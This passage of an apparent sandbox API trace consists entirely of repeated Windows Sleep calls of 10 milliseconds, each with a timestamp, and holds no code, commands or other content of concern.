(dwMilliseconds=0xa) [0162.243] Sleep (dwMilliseconds=0xa) [0162.258] Sleep (dwMilliseconds=0xa) [0162.277] Sleep (dwMilliseconds=0xa) [0162.290] Sleep (dwMilliseconds=0xa) [0162.306] Sleep (dwMilliseconds=0xa) [0162.321] Sleep (dwMilliseconds=0xa) [0162.337] Sleep (dwMilliseconds=0xa) [0162.352] Sleep (dwMilliseconds=0xa) [0162.368] Sleep (dwMilliseconds=0xa) [0162.414] Sleep (dwMilliseconds=0xa) [0162.430] Sleep (dwMilliseconds=0xa) [0162.452] Sleep (dwMilliseconds=0xa) [0162.461] Sleep (dwMilliseconds=0xa) [0162.477] Sleep (dwMilliseconds=0xa) [0162.492] Sleep (dwMilliseconds=0xa) [0162.509] Sleep (dwMilliseconds=0xa) [0162.524] Sleep (dwMilliseconds=0xa) [0162.539] Sleep (dwMilliseconds=0xa) [0162.555] Sleep (dwMilliseconds=0xa) [0162.570] Sleep (dwMilliseconds=0xa) [0162.618] Sleep (dwMilliseconds=0xa) [0162.633] Sleep (dwMilliseconds=0xa) [0162.659] Sleep (dwMilliseconds=0xa) [0162.664] Sleep (dwMilliseconds=0xa) [0162.680] Sleep (dwMilliseconds=0xa) [0162.695] Sleep (dwMilliseconds=0xa) [0162.711] Sleep (dwMilliseconds=0xa) [0162.731] Sleep (dwMilliseconds=0xa) [0162.773] Sleep (dwMilliseconds=0xa) [0162.821] Sleep (dwMilliseconds=0xa) [0162.846] Sleep (dwMilliseconds=0xa) [0162.851] Sleep (dwMilliseconds=0xa) [0162.867] Sleep (dwMilliseconds=0xa) [0162.882] Sleep (dwMilliseconds=0xa) [0162.898] Sleep (dwMilliseconds=0xa) [0162.914] Sleep (dwMilliseconds=0xa) [0162.929] Sleep (dwMilliseconds=0xa) [0162.947] Sleep (dwMilliseconds=0xa) [0162.992] Sleep (dwMilliseconds=0xa) [0163.039] Sleep (dwMilliseconds=0xa) [0163.076] Sleep (dwMilliseconds=0xa) [0163.085] Sleep (dwMilliseconds=0xa) [0163.101] Sleep (dwMilliseconds=0xa) [0163.116] Sleep (dwMilliseconds=0xa) [0163.136] Sleep (dwMilliseconds=0xa) [0163.148] Sleep (dwMilliseconds=0xa) [0163.163] Sleep (dwMilliseconds=0xa) [0163.181] Sleep (dwMilliseconds=0xa) [0163.225] Sleep (dwMilliseconds=0xa) [0163.273] Sleep (dwMilliseconds=0xa) [0163.293] Sleep (dwMilliseconds=0xa) [0163.303] Sleep (dwMilliseconds=0xa) [0163.319] Sleep (dwMilliseconds=0xa) [0163.340] Sleep (dwMilliseconds=0xa) [0163.350] Sleep (dwMilliseconds=0xa) [0163.366] Sleep (dwMilliseconds=0xa) [0163.382] Sleep (dwMilliseconds=0xa) [0163.428] Sleep (dwMilliseconds=0xa) [0163.489] Sleep (dwMilliseconds=0xa) [0163.493] Sleep (dwMilliseconds=0xa) [0163.506] Sleep (dwMilliseconds=0xa) [0163.522] Sleep (dwMilliseconds=0xa) [0163.538] Sleep (dwMilliseconds=0xa) [0163.554] Sleep (dwMilliseconds=0xa) [0163.569] Sleep (dwMilliseconds=0xa) [0163.585] Sleep (dwMilliseconds=0xa) [0163.632] Sleep (dwMilliseconds=0xa) [0163.678] Sleep (dwMilliseconds=0xa) [0163.696] Sleep (dwMilliseconds=0xa) [0163.709] Sleep (dwMilliseconds=0xa) [0163.725] Sleep (dwMilliseconds=0xa) [0163.742] Sleep (dwMilliseconds=0xa) [0163.756] Sleep (dwMilliseconds=0xa) [0163.772] Sleep (dwMilliseconds=0xa) [0163.787] Sleep (dwMilliseconds=0xa) [0163.834] Sleep (dwMilliseconds=0xa) [0163.893] Sleep (dwMilliseconds=0xa) [0163.899] Sleep (dwMilliseconds=0xa) [0163.912] Sleep (dwMilliseconds=0xa) [0163.927] Sleep (dwMilliseconds=0xa) [0163.943] Sleep (dwMilliseconds=0xa) [0163.960] Sleep (dwMilliseconds=0xa) [0163.974] Sleep (dwMilliseconds=0xa) [0163.993] Sleep (dwMilliseconds=0xa) [0164.037] Sleep (dwMilliseconds=0xa) [0164.112] Sleep (dwMilliseconds=0xa) [0164.115] Sleep (dwMilliseconds=0xa) [0164.130] Sleep (dwMilliseconds=0xa) [0164.146] Sleep (dwMilliseconds=0xa) [0164.163] Sleep (dwMilliseconds=0xa) [0164.177] Sleep (dwMilliseconds=0xa) [0164.193] Sleep (dwMilliseconds=0xa) [0164.209] Sleep (dwMilliseconds=0xa) [0164.255] Sleep (dwMilliseconds=0xa) [0164.302] Sleep (dwMilliseconds=0xa) [0164.317] Sleep (dwMilliseconds=0xa) [0164.333] Sleep (dwMilliseconds=0xa) [0164.349] Sleep (dwMilliseconds=0xa) [0164.364] Sleep (dwMilliseconds=0xa) [0164.380] Sleep (dwMilliseconds=0xa) [0164.396] Sleep (dwMilliseconds=0xa) [0164.412] Sleep (dwMilliseconds=0xa) [0164.458] Sleep (dwMilliseconds=0xa) [0164.505] Sleep (dwMilliseconds=0xa) [0164.539] Sleep (dwMilliseconds=0xa) [0164.552] Sleep (dwMilliseconds=0xa) [0164.567] Sleep (dwMilliseconds=0xa) [0164.583] Sleep (dwMilliseconds=0xa) [0164.598] Sleep (dwMilliseconds=0xa) [0164.614] Sleep (dwMilliseconds=0xa) [0164.630] Sleep (dwMilliseconds=0xa) [0164.677] Sleep (dwMilliseconds=0xa) [0164.723] Sleep (dwMilliseconds=0xa) [0164.775] Sleep (dwMilliseconds=0xa) [0164.785] Sleep (dwMilliseconds=0xa) [0164.801] Sleep (dwMilliseconds=0xa) [0164.817] Sleep (dwMilliseconds=0xa) [0164.832] Sleep (dwMilliseconds=0xa) [0166.364] Sleep (dwMilliseconds=0xa) [0166.414] Sleep (dwMilliseconds=0xa) [0166.455] Sleep (dwMilliseconds=0xa) [0166.495] Sleep (dwMilliseconds=0xa) [0166.501] Sleep (dwMilliseconds=0xa) [0166.517] Sleep (dwMilliseconds=0xa) [0166.559] Sleep (dwMilliseconds=0xa) [0166.564] Sleep (dwMilliseconds=0xa) [0166.611] Sleep (dwMilliseconds=0xa) [0166.657] Sleep (dwMilliseconds=0xa) [0166.674] Sleep (dwMilliseconds=0xa) [0166.689] Sleep (dwMilliseconds=0xa) [0166.705] Sleep (dwMilliseconds=0xa) [0166.721] Sleep (dwMilliseconds=0xa) [0166.736] Sleep (dwMilliseconds=0xa) [0166.751] Sleep (dwMilliseconds=0xa) [0166.767] Sleep (dwMilliseconds=0xa) [0166.814] Sleep (dwMilliseconds=0xa) [0166.861] Sleep (dwMilliseconds=0xa) [0166.893] Sleep (dwMilliseconds=0xa) [0166.907] Sleep (dwMilliseconds=0xa) [0166.923] Sleep (dwMilliseconds=0xa) [0166.939] Sleep (dwMilliseconds=0xa) [0166.954] Sleep (dwMilliseconds=0xa) [0166.970] Sleep (dwMilliseconds=0xa) [0167.017] Sleep (dwMilliseconds=0xa) [0167.064] Sleep (dwMilliseconds=0xa) [0167.120] Sleep (dwMilliseconds=0xa) [0167.126] Sleep (dwMilliseconds=0xa) [0167.141] Sleep (dwMilliseconds=0xa) [0167.157] Sleep (dwMilliseconds=0xa) [0167.172] Sleep (dwMilliseconds=0xa) [0167.189] Sleep (dwMilliseconds=0xa) [0167.235] Sleep (dwMilliseconds=0xa) [0167.282] Sleep (dwMilliseconds=0xa) [0167.323] Sleep (dwMilliseconds=0xa) [0167.328] Sleep (dwMilliseconds=0xa) [0167.354] Sleep (dwMilliseconds=0xa) [0167.359] Sleep (dwMilliseconds=0xa) [0167.375] Sleep (dwMilliseconds=0xa) [0167.391] Sleep (dwMilliseconds=0xa) [0167.407] Sleep (dwMilliseconds=0xa) [0167.453] Sleep (dwMilliseconds=0xa) [0167.489] Sleep (dwMilliseconds=0xa) [0167.514] Sleep (dwMilliseconds=0xa) [0167.516] Sleep (dwMilliseconds=0xa) [0167.560] Sleep (dwMilliseconds=0xa) [0167.563] Sleep (dwMilliseconds=0xa) [0167.579] Sleep (dwMilliseconds=0xa) [0167.595] Sleep (dwMilliseconds=0xa) [0167.642] Sleep (dwMilliseconds=0xa) [0167.688] Sleep (dwMilliseconds=0xa) [0167.747] Sleep (dwMilliseconds=0xa) [0167.749] Sleep (dwMilliseconds=0xa) [0167.765] Sleep (dwMilliseconds=0xa) [0167.781] Sleep (dwMilliseconds=0xa) [0167.796] Sleep (dwMilliseconds=0xa) [0167.812] Sleep (dwMilliseconds=0xa) [0167.859] Sleep (dwMilliseconds=0xa) [0167.905] Sleep (dwMilliseconds=0xa) [0167.921] Sleep (dwMilliseconds=0xa) [0167.951] Sleep (dwMilliseconds=0xa) [0167.952] Sleep (dwMilliseconds=0xa) [0167.969] Sleep (dwMilliseconds=0xa) [0167.984] Sleep (dwMilliseconds=0xa) [0167.999] Sleep (dwMilliseconds=0xa) [0168.016] Sleep (dwMilliseconds=0xa) [0168.067] Sleep (dwMilliseconds=0xa) [0168.111] Sleep (dwMilliseconds=0xa) [0168.152] Sleep (dwMilliseconds=0xa) [0168.155] Sleep (dwMilliseconds=0xa) [0168.171] Sleep (dwMilliseconds=0xa) [0168.186] Sleep (dwMilliseconds=0xa) [0168.202] Sleep (dwMilliseconds=0xa) [0168.218] Sleep (dwMilliseconds=0xa) [0168.233] Sleep (dwMilliseconds=0xa) [0168.280] Sleep (dwMilliseconds=0xa) [0168.327] Sleep (dwMilliseconds=0xa) [0168.342] Sleep (dwMilliseconds=0xa) [0168.373] Sleep (dwMilliseconds=0xa) [0168.373] Sleep (dwMilliseconds=0xa) [0168.389] Sleep (dwMilliseconds=0xa) [0168.405] Sleep (dwMilliseconds=0xa) [0168.425] Sleep (dwMilliseconds=0xa) [0168.437] Sleep (dwMilliseconds=0xa) [0168.483] Sleep (dwMilliseconds=0xa) [0168.558] Sleep (dwMilliseconds=0xa) [0168.612] Sleep (dwMilliseconds=0xa) [0168.625] Sleep (dwMilliseconds=0xa) [0168.640] Sleep (dwMilliseconds=0xa) [0168.657] Sleep (dwMilliseconds=0xa) [0168.675] Sleep (dwMilliseconds=0xa) [0168.686] Sleep (dwMilliseconds=0xa) [0168.703] Sleep (dwMilliseconds=0xa) [0168.749] Sleep (dwMilliseconds=0xa) [0168.796] Sleep (dwMilliseconds=0xa) [0168.827] Sleep (dwMilliseconds=0xa) [0168.843] Sleep (dwMilliseconds=0xa) [0168.858] Sleep (dwMilliseconds=0xa) [0168.877] Sleep (dwMilliseconds=0xa) [0168.888] Sleep (dwMilliseconds=0xa) [0168.904] Sleep (dwMilliseconds=0xa) [0168.920] Sleep (dwMilliseconds=0xa) [0168.968] Sleep (dwMilliseconds=0xa) [0169.014] Sleep (dwMilliseconds=0xa) [0169.031] Sleep (dwMilliseconds=0xa) [0169.045] Sleep (dwMilliseconds=0xa) [0169.061] Sleep (dwMilliseconds=0xa) [0169.076] Sleep (dwMilliseconds=0xa) [0169.093] Sleep (dwMilliseconds=0xa) [0169.107] Sleep (dwMilliseconds=0xa) [0169.141] Sleep (dwMilliseconds=0xa) [0169.187] Sleep (dwMilliseconds=0xa) [0169.234] Sleep (dwMilliseconds=0xa) [0169.278] Sleep (dwMilliseconds=0xa) [0169.278] Sleep (dwMilliseconds=0xa) [0169.294] Sleep (dwMilliseconds=0xa) [0169.310] Sleep (dwMilliseconds=0xa) [0169.325] Sleep (dwMilliseconds=0xa) [0169.342] Sleep (dwMilliseconds=0xa) [0169.356] Sleep (dwMilliseconds=0xa) [0169.419] Sleep (dwMilliseconds=0xa) [0169.467] Sleep (dwMilliseconds=0xa) [0169.501] Sleep (dwMilliseconds=0xa) [0169.512] Sleep (dwMilliseconds=0xa) [0169.547] Sleep (dwMilliseconds=0xa) [0169.560] Sleep (dwMilliseconds=0xa) [0169.576] Sleep (dwMilliseconds=0xa) [0169.622] Sleep (dwMilliseconds=0xa) [0169.668] Sleep (dwMilliseconds=0xa) [0169.709] Sleep (dwMilliseconds=0xa) [0169.715] Sleep (dwMilliseconds=0xa) [0169.731] Sleep (dwMilliseconds=0xa) [0169.746] Sleep (dwMilliseconds=0xa) [0169.762] Sleep (dwMilliseconds=0xa) [0169.778] Sleep (dwMilliseconds=0xa) [0169.794] Sleep (dwMilliseconds=0xa) [0169.840] Sleep (dwMilliseconds=0xa) [0169.887] Sleep (dwMilliseconds=0xa) [0169.920] Sleep (dwMilliseconds=0xa) [0169.934] Sleep (dwMilliseconds=0xa) [0169.949] Sleep (dwMilliseconds=0xa) [0169.965] Sleep (dwMilliseconds=0xa) [0169.980] Sleep (dwMilliseconds=0xa) [0169.996] Sleep (dwMilliseconds=0xa) [0170.012] Sleep (dwMilliseconds=0xa) [0170.059] Sleep (dwMilliseconds=0xa) [0170.105] Sleep (dwMilliseconds=0xa) [0170.143] Sleep (dwMilliseconds=0xa) [0170.152] Sleep (dwMilliseconds=0xa) [0170.167] Sleep (dwMilliseconds=0xa) [0170.183] Sleep (dwMilliseconds=0xa) [0170.199] Sleep (dwMilliseconds=0xa) [0170.214] Sleep (dwMilliseconds=0xa) [0170.231] Sleep (dwMilliseconds=0xa) [0170.277] Sleep (dwMilliseconds=0xa) [0170.325] Sleep (dwMilliseconds=0xa) [0170.376] Sleep (dwMilliseconds=0xa) [0170.388] Sleep (dwMilliseconds=0xa) [0170.402] Sleep (dwMilliseconds=0xa) [0170.417] Sleep (dwMilliseconds=0xa) [0170.433] Sleep (dwMilliseconds=0xa) [0170.450] Sleep (dwMilliseconds=0xa) [0170.495] Sleep (dwMilliseconds=0xa) [0170.558] Sleep (dwMilliseconds=0xa) [0170.606] Sleep (dwMilliseconds=0xa) [0170.620] Sleep (dwMilliseconds=0xa) [0170.644] Sleep (dwMilliseconds=0xa) [0170.652] Sleep (dwMilliseconds=0xa) [0170.667] Sleep (dwMilliseconds=0xa) [0170.687] Sleep (dwMilliseconds=0xa) [0170.730] Sleep (dwMilliseconds=0xa) [0170.777] Sleep (dwMilliseconds=0xa) [0170.819] Sleep (dwMilliseconds=0xa) [0170.823] Sleep (dwMilliseconds=0xa) [0170.838] Sleep (dwMilliseconds=0xa) [0170.854] Sleep (dwMilliseconds=0xa) [0170.870] Sleep (dwMilliseconds=0xa) [0170.886] Sleep (dwMilliseconds=0xa) [0170.901] Sleep (dwMilliseconds=0xa) [0170.948] Sleep (dwMilliseconds=0xa) [0171.017] Sleep (dwMilliseconds=0xa) [0171.034] Sleep (dwMilliseconds=0xa) [0171.041] Sleep (dwMilliseconds=0xa) [0171.058] Sleep (dwMilliseconds=0xa) [0171.072] Sleep (dwMilliseconds=0xa) [0171.088] Sleep (dwMilliseconds=0xa) [0171.104] Sleep (dwMilliseconds=0xa) [0171.120] Sleep (dwMilliseconds=0xa) [0171.166] Sleep (dwMilliseconds=0xa) [0171.213] Sleep (dwMilliseconds=0xa) [0171.243] Sleep (dwMilliseconds=0xa) [0171.244] Sleep (dwMilliseconds=0xa) [0171.259] Sleep (dwMilliseconds=0xa) [0171.275] Sleep (dwMilliseconds=0xa) [0171.291] Sleep (dwMilliseconds=0xa) [0171.307] Sleep (dwMilliseconds=0xa) [0171.323] Sleep (dwMilliseconds=0xa) [0171.338] Sleep (dwMilliseconds=0xa) [0171.385] Sleep (dwMilliseconds=0xa) [0171.442] Sleep (dwMilliseconds=0xa) [0171.479] Sleep (dwMilliseconds=0xa) [0171.494] Sleep (dwMilliseconds=0xa) [0171.509] Sleep (dwMilliseconds=0xa) [0171.546] Sleep (dwMilliseconds=0xa) [0171.556] Sleep (dwMilliseconds=0xa) [0171.618] Sleep (dwMilliseconds=0xa) [0171.666] Sleep (dwMilliseconds=0xa) [0171.699] Sleep (dwMilliseconds=0xa) [0171.712] Sleep (dwMilliseconds=0xa) [0171.728] Sleep (dwMilliseconds=0xa) [0171.743] Sleep (dwMilliseconds=0xa) [0171.759] Sleep (dwMilliseconds=0xa) [0171.776] Sleep (dwMilliseconds=0xa) [0171.821] Sleep (dwMilliseconds=0xa) [0171.870] Sleep (dwMilliseconds=0xa) [0171.946] Sleep (dwMilliseconds=0xa) [0171.962] Sleep (dwMilliseconds=0xa) [0171.977] Sleep (dwMilliseconds=0xa) [0171.994] Sleep (dwMilliseconds=0xa) [0172.040] Sleep (dwMilliseconds=0xa) [0172.086] Sleep (dwMilliseconds=0xa) [0172.102] Sleep (dwMilliseconds=0xa) [0172.118] Sleep (dwMilliseconds=0xa) [0172.134] Sleep (dwMilliseconds=0xa) [0172.149] Sleep (dwMilliseconds=0xa) [0172.164] Sleep (dwMilliseconds=0xa) [0172.180] Sleep (dwMilliseconds=0xa) [0172.197] Sleep (dwMilliseconds=0xa) [0172.243] Sleep (dwMilliseconds=0xa) [0172.289] Sleep (dwMilliseconds=0xa) [0172.307] Sleep (dwMilliseconds=0xa) [0172.321] Sleep (dwMilliseconds=0xa) [0172.336] Sleep (dwMilliseconds=0xa) [0172.352] Sleep (dwMilliseconds=0xa) [0172.367] Sleep (dwMilliseconds=0xa) [0172.383] Sleep (dwMilliseconds=0xa) [0172.400] Sleep (dwMilliseconds=0xa) [0172.445] Sleep (dwMilliseconds=0xa) [0172.493] Sleep (dwMilliseconds=0xa) [0172.521] Sleep (dwMilliseconds=0xa) [0172.540] Sleep (dwMilliseconds=0xa) [0172.554] Sleep (dwMilliseconds=0xa) [0172.570] Sleep (dwMilliseconds=0xa) [0172.586] Sleep (dwMilliseconds=0xa) [0172.601] Sleep (dwMilliseconds=0xa) [0172.617] Sleep (dwMilliseconds=0xa) [0172.664] Sleep (dwMilliseconds=0xa) [0172.710] Sleep (dwMilliseconds=0xa) [0172.728] Sleep (dwMilliseconds=0xa) [0172.742] Sleep (dwMilliseconds=0xa) [0172.757] Sleep (dwMilliseconds=0xa) [0172.774] Sleep (dwMilliseconds=0xa) [0172.788] Sleep (dwMilliseconds=0xa) [0172.804] Sleep (dwMilliseconds=0xa) [0172.820] Sleep (dwMilliseconds=0xa) [0172.868] Sleep (dwMilliseconds=0xa) [0172.914] Sleep (dwMilliseconds=0xa) [0172.935] Sleep (dwMilliseconds=0xa) [0172.944] Sleep (dwMilliseconds=0xa) [0172.965] Sleep (dwMilliseconds=0xa) [0172.975] Sleep (dwMilliseconds=0xa) [0172.991] Sleep (dwMilliseconds=0xa) [0173.007] Sleep (dwMilliseconds=0xa) [0173.024] Sleep (dwMilliseconds=0xa) [0173.070] Sleep (dwMilliseconds=0xa) [0173.116] Sleep (dwMilliseconds=0xa) [0173.141] Sleep (dwMilliseconds=0xa) [0173.147] Sleep (dwMilliseconds=0xa) [0173.163] Sleep (dwMilliseconds=0xa) [0173.178] Sleep (dwMilliseconds=0xa) [0173.194] Sleep (dwMilliseconds=0xa) [0173.210] Sleep (dwMilliseconds=0xa) [0173.225] Sleep (dwMilliseconds=0xa) [0173.242] Sleep (dwMilliseconds=0xa) [0173.288] Sleep (dwMilliseconds=0xa) [0173.334] Sleep (dwMilliseconds=0xa) [0173.350] Sleep (dwMilliseconds=0xa) [0173.366] Sleep (dwMilliseconds=0xa) [0173.381] Sleep (dwMilliseconds=0xa) [0173.397] Sleep (dwMilliseconds=0xa) [0173.413] Sleep (dwMilliseconds=0xa) [0173.428] Sleep (dwMilliseconds=0xa) [0173.445] Sleep (dwMilliseconds=0xa) [0173.491] Sleep (dwMilliseconds=0xa) [0173.569] Sleep (dwMilliseconds=0xa) [0173.591] Sleep (dwMilliseconds=0xa) [0173.599] Sleep (dwMilliseconds=0xa) [0173.615] Sleep (dwMilliseconds=0xa) [0173.632] Sleep (dwMilliseconds=0xa) [0173.646] Sleep (dwMilliseconds=0xa) [0173.662] Sleep (dwMilliseconds=0xa) [0173.678] Sleep (dwMilliseconds=0xa) [0173.724] Sleep (dwMilliseconds=0xa) [0173.772] Sleep (dwMilliseconds=0xa) [0173.823] Sleep (dwMilliseconds=0xa) [0173.833] Sleep (dwMilliseconds=0xa) [0173.849] Sleep (dwMilliseconds=0xa) [0173.865] Sleep (dwMilliseconds=0xa) [0173.880] Sleep (dwMilliseconds=0xa) [0173.897] Sleep (dwMilliseconds=0xa) [0173.943] Sleep (dwMilliseconds=0xa) [0173.989] Sleep (dwMilliseconds=0xa) [0174.032] Sleep (dwMilliseconds=0xa) [0174.037] Sleep (dwMilliseconds=0xa) [0174.052] Sleep (dwMilliseconds=0xa) [0174.067] Sleep (dwMilliseconds=0xa) [0174.083] Sleep (dwMilliseconds=0xa) [0174.099] Sleep (dwMilliseconds=0xa) [0174.116] Sleep (dwMilliseconds=0xa) [0174.161] Sleep (dwMilliseconds=0xa) [0174.208] Sleep (dwMilliseconds=0xa) [0174.227] Sleep (dwMilliseconds=0xa) [0174.239] Sleep (dwMilliseconds=0xa) [0174.255] Sleep (dwMilliseconds=0xa) [0174.270] Sleep (dwMilliseconds=0xa) [0174.286] Sleep (dwMilliseconds=0xa) [0174.302] Sleep (dwMilliseconds=0xa) [0174.322] Sleep (dwMilliseconds=0xa) [0174.364] Sleep (dwMilliseconds=0xa) [0174.412] Sleep (dwMilliseconds=0xa) [0174.435] Sleep (dwMilliseconds=0xa) [0174.442] Sleep (dwMilliseconds=0xa) [0174.458] Sleep (dwMilliseconds=0xa) [0174.473] Sleep (dwMilliseconds=0xa) [0174.489] Sleep (dwMilliseconds=0xa) [0174.505] Sleep (dwMilliseconds=0xa) [0174.520] Sleep (dwMilliseconds=0xa) [0174.584] Sleep (dwMilliseconds=0xa) [0174.629] Sleep (dwMilliseconds=0xa) [0174.662] Sleep (dwMilliseconds=0xa) [0174.676] Sleep (dwMilliseconds=0xa) [0174.691] Sleep (dwMilliseconds=0xa) [0174.707] Sleep (dwMilliseconds=0xa) [0174.723] Sleep (dwMilliseconds=0xa) [0174.739] Sleep (dwMilliseconds=0xa) [0174.755] Sleep (dwMilliseconds=0xa) [0174.801] Sleep (dwMilliseconds=0xa) [0174.863] Sleep (dwMilliseconds=0xa) [0174.892] Sleep (dwMilliseconds=0xa) [0174.894] Sleep (dwMilliseconds=0xa) [0174.913] Sleep (dwMilliseconds=0xa) [0174.926] Sleep (dwMilliseconds=0xa) [0174.942] Sleep (dwMilliseconds=0xa) [0174.957] Sleep (dwMilliseconds=0xa) [0174.981] Sleep (dwMilliseconds=0xa) [0175.020] Sleep (dwMilliseconds=0xa) [0175.066] Sleep (dwMilliseconds=0xa) [0175.089] Sleep (dwMilliseconds=0xa) [0175.097] Sleep (dwMilliseconds=0xa) [0175.113] Sleep (dwMilliseconds=0xa) [0175.136] Sleep (dwMilliseconds=0xa) [0175.145] Sleep (dwMilliseconds=0xa) [0175.160] Sleep (dwMilliseconds=0xa) [0175.175] Sleep (dwMilliseconds=0xa) [0175.193] Sleep (dwMilliseconds=0xa) [0175.239] Sleep (dwMilliseconds=0xa) [0175.284] Sleep (dwMilliseconds=0xa) [0175.314] Sleep (dwMilliseconds=0xa) [0175.316] Sleep (dwMilliseconds=0xa) [0175.331] Sleep (dwMilliseconds=0xa) [0175.348] Sleep (dwMilliseconds=0xa) [0175.362] Sleep (dwMilliseconds=0xa) [0175.378] Sleep (dwMilliseconds=0xa) [0175.394] Sleep (dwMilliseconds=0xa) [0175.409] Sleep (dwMilliseconds=0xa) [0175.457] Sleep (dwMilliseconds=0xa) [0175.503] Sleep (dwMilliseconds=0xa) [0175.519] Sleep (dwMilliseconds=0xa) [0175.551] Sleep (dwMilliseconds=0xa) [0175.566] Sleep (dwMilliseconds=0xa) [0175.581] Sleep (dwMilliseconds=0xa) [0175.597] Sleep (dwMilliseconds=0xa) [0175.612] Sleep (dwMilliseconds=0xa) [0175.659] Sleep (dwMilliseconds=0xa) [0175.706] Sleep (dwMilliseconds=0xa) [0175.744] Sleep (dwMilliseconds=0xa) [0175.752] Sleep (dwMilliseconds=0xa) [0175.768] Sleep (dwMilliseconds=0xa) [0175.783] Sleep (dwMilliseconds=0xa) [0175.801] Sleep (dwMilliseconds=0xa) [0175.819] Sleep (dwMilliseconds=0xa) [0175.830] Sleep (dwMilliseconds=0xa) [0175.877] Sleep (dwMilliseconds=0xa) [0175.924] Sleep (dwMilliseconds=0xa) [0175.971] Sleep (dwMilliseconds=0xa) [0175.989] Sleep (dwMilliseconds=0xa) [0176.002] Sleep (dwMilliseconds=0xa) [0176.019] Sleep (dwMilliseconds=0xa) [0176.034] Sleep (dwMilliseconds=0xa) [0176.080] Sleep (dwMilliseconds=0xa) [0176.128] Sleep (dwMilliseconds=0xa) [0176.154] Sleep (dwMilliseconds=0xa) [0176.158] Sleep (dwMilliseconds=0xa) [0176.174] Sleep (dwMilliseconds=0xa) [0176.190] Sleep (dwMilliseconds=0xa) [0176.205] Sleep (dwMilliseconds=0xa) [0176.221] Sleep (dwMilliseconds=0xa) [0176.236] Sleep (dwMilliseconds=0xa) [0176.253] Sleep (dwMilliseconds=0xa) [0176.299] Sleep (dwMilliseconds=0xa) [0176.345] Sleep (dwMilliseconds=0xa) [0176.364] Sleep (dwMilliseconds=0xa) [0176.376] Sleep (dwMilliseconds=0xa) [0176.392] Sleep (dwMilliseconds=0xa) [0176.408] Sleep (dwMilliseconds=0xa) [0176.424] Sleep (dwMilliseconds=0xa) [0176.439] Sleep (dwMilliseconds=0xa) [0176.454] Sleep (dwMilliseconds=0xa) [0176.502] Sleep (dwMilliseconds=0xa) [0176.564] Sleep (dwMilliseconds=0xa) [0176.584] Sleep (dwMilliseconds=0xa) [0176.598] Sleep (dwMilliseconds=0xa) [0176.611] Sleep (dwMilliseconds=0xa) [0176.629] Sleep (dwMilliseconds=0xa) [0176.642] Sleep (dwMilliseconds=0xa) [0176.657] Sleep (dwMilliseconds=0xa) [0176.673] Sleep (dwMilliseconds=0xa) [0176.721] Sleep (dwMilliseconds=0xa) [0176.766] Sleep (dwMilliseconds=0xa) [0176.786] Sleep (dwMilliseconds=0xa) [0176.797] Sleep (dwMilliseconds=0xa) [0176.814] Sleep (dwMilliseconds=0xa) [0176.830] Sleep (dwMilliseconds=0xa) [0176.845] Sleep (dwMilliseconds=0xa) [0176.860] Sleep (dwMilliseconds=0xa) [0176.876] Sleep (dwMilliseconds=0xa) [0176.922] Sleep (dwMilliseconds=0xa) [0176.969] Sleep (dwMilliseconds=0xa) [0176.989] Sleep (dwMilliseconds=0xa) [0177.000] Sleep (dwMilliseconds=0xa) [0177.017] Sleep (dwMilliseconds=0xa) [0177.032] Sleep (dwMilliseconds=0xa) [0177.049] Sleep (dwMilliseconds=0xa) [0177.063] Sleep (dwMilliseconds=0xa) [0177.078] Sleep (dwMilliseconds=0xa) [0177.126] Sleep (dwMilliseconds=0xa) [0177.173] Sleep (dwMilliseconds=0xa) [0177.193] Sleep (dwMilliseconds=0xa) [0177.203] Sleep (dwMilliseconds=0xa) [0177.219] Sleep (dwMilliseconds=0xa) [0177.234] Sleep (dwMilliseconds=0xa) [0177.250] Sleep (dwMilliseconds=0xa) [0177.266] Sleep (dwMilliseconds=0xa) [0177.282] Sleep (dwMilliseconds=0xa) [0177.328] Sleep (dwMilliseconds=0xa) [0177.375] Sleep (dwMilliseconds=0xa) [0177.390] Sleep (dwMilliseconds=0xa) [0177.407] Sleep (dwMilliseconds=0xa) [0177.423] Sleep (dwMilliseconds=0xa) [0177.438] Sleep (dwMilliseconds=0xa) [0177.453] Sleep (dwMilliseconds=0xa) [0177.468] Sleep (dwMilliseconds=0xa) [0177.485] Sleep (dwMilliseconds=0xa) [0177.553] Sleep (dwMilliseconds=0xa) [0177.600] Sleep (dwMilliseconds=0xa) [0177.626] Sleep (dwMilliseconds=0xa) [0177.640] Sleep (dwMilliseconds=0xa) [0177.656] Sleep (dwMilliseconds=0xa) [0177.717] Sleep (dwMilliseconds=0xa) [0177.721] Sleep (dwMilliseconds=0xa) [0177.733] Sleep (dwMilliseconds=0xa) [0177.749] Sleep (dwMilliseconds=0xa) [0177.796] Sleep (dwMilliseconds=0xa) [0177.844] Sleep (dwMilliseconds=0xa) [0177.858] Sleep (dwMilliseconds=0xa) [0177.874] Sleep (dwMilliseconds=0xa) [0177.890] Sleep (dwMilliseconds=0xa) [0177.905] Sleep (dwMilliseconds=0xa) [0177.921] Sleep (dwMilliseconds=0xa) [0177.937] Sleep (dwMilliseconds=0xa) [0177.953] Sleep (dwMilliseconds=0xa) [0177.999] Sleep (dwMilliseconds=0xa) [0178.046] Sleep (dwMilliseconds=0xa) [0178.100] Sleep (dwMilliseconds=0xa) [0178.108] Sleep (dwMilliseconds=0xa) [0178.123] Sleep (dwMilliseconds=0xa) [0178.139] Sleep (dwMilliseconds=0xa) [0178.155] Sleep (dwMilliseconds=0xa) [0178.170] Sleep (dwMilliseconds=0xa) [0178.187] Sleep (dwMilliseconds=0xa) [0178.233] Sleep (dwMilliseconds=0xa) [0178.280] Sleep (dwMilliseconds=0xa) [0178.315] Sleep (dwMilliseconds=0xa) [0178.326] Sleep (dwMilliseconds=0xa) [0178.342] Sleep (dwMilliseconds=0xa) [0178.357] Sleep (dwMilliseconds=0xa) [0178.373] Sleep (dwMilliseconds=0xa) [0178.389] Sleep (dwMilliseconds=0xa) [0178.406] Sleep (dwMilliseconds=0xa) [0178.451] Sleep (dwMilliseconds=0xa) [0178.498] Sleep (dwMilliseconds=0xa) [0178.521] Sleep (dwMilliseconds=0xa) [0178.531] Sleep (dwMilliseconds=0xa) [0178.545] Sleep (dwMilliseconds=0xa) [0178.577] Sleep (dwMilliseconds=0xa) [0178.592] Sleep (dwMilliseconds=0xa) [0178.617] Sleep (dwMilliseconds=0xa) [0178.654] Sleep (dwMilliseconds=0xa) [0178.701] Sleep (dwMilliseconds=0xa) [0178.729] Sleep (dwMilliseconds=0xa) [0178.732] Sleep (dwMilliseconds=0xa) [0178.747] Sleep (dwMilliseconds=0xa) [0178.763] Sleep (dwMilliseconds=0xa) [0178.779] Sleep (dwMilliseconds=0xa) [0178.794] Sleep (dwMilliseconds=0xa) [0178.810] 